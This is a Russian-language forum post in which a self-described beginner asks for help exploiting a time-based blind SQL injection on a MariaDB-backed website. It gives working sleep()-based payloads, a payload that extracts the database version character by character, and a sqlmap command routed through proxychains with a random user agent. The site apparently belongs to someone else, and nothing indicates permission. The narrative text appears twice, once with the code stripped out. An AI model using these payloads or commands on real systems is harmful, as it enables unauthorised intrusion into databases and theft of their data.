Добрый вечер, сканер Acunetix обнаружил уязвимость на сайте и выдал payload:
Решил проверить в sqlmap'e, пытался по-разному скормить, но ничего не вышло. Грузил запрос с этой нагрузкой - не вышло, ставил * вместо нее - не вышло. Игрался с флагами -р; -r; -technique; -level; -risk; -random-agent - тоже ничего.
Когда кое-как скормил ему готовый payload выдало, что инъекция тут ложная, но вроде она была опознана..
Потом решил крутануть в burp'e. Решил посмотреть версию MariaBD, для этого начал менять полезную нагрузку. Так как я только учусь, методом тыка сократил до:
Далее понял, что проходит только 2 select
Задался вопросом, что там делает "v", но чат GPT сказал, что она там для синтаксиса и вообще так надо.
Долго мучался и сообразил это:
Камнем преткновения стала злополучная буква "v", чтобы нагрузка заработала нужно было переставить за другую скобку:
Убедился, что скуля не ложная, скормил sqlmap'y, но опять тщетно...
Сейчас команда выглядит так:
Подскажите, может кто сталкивался? Тянуть берпом без PRO версии это путь в никуда, видел еще на форуме способ с WFUZZ. Буду его пробовать, но не покидает чувство, как будто я что-то упускаю...
Код:
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
Решил проверить в sqlmap'e, пытался по-разному скормить, но ничего не вышло. Грузил запрос с этой нагрузкой - не вышло, ставил * вместо нее - не вышло. Игрался с флагами -р; -r; -technique; -level; -risk; -random-agent - тоже ничего.
Когда кое-как скормил ему готовый payload выдало, что инъекция тут ложная, но вроде она была опознана..
Потом решил крутануть в burp'e. Решил посмотреть версию MariaBD, для этого начал менять полезную нагрузку. Так как я только учусь, методом тыка сократил до:
Код:
(select(0)from(select(sleep(3)))v)
Далее понял, что проходит только 2 select
Код:
(select(0)from(select( sleep(3) ))v)
Задался вопросом, что там делает "v", но чат GPT сказал, что она там для синтаксиса и вообще так надо.
Долго мучался и сообразил это:
Код:
(select(0)from(select(IF((SUBSTRING(VERSION(),1,1)='1'),sleep(10),sleep(3)))v))
Камнем преткновения стала злополучная буква "v", чтобы нагрузка заработала нужно было переставить за другую скобку:
Код:
(select(0)from(select(IF((SUBSTRING(VERSION(),1,1)='1'),sleep(10),sleep(3))))v)
Убедился, что скуля не ложная, скормил sqlmap'y, но опять тщетно...
Сейчас команда выглядит так:
Код:
proxychains sqlmap -r /zapros.txt --method POST --technique=T --banner --level 5 --risk 3 --random-agent
Подскажите, может кто сталкивался? Тянуть берпом без PRO версии это путь в никуда, видел еще на форуме способ с WFUZZ. Буду его пробовать, но не покидает чувство, как будто я что-то упускаю...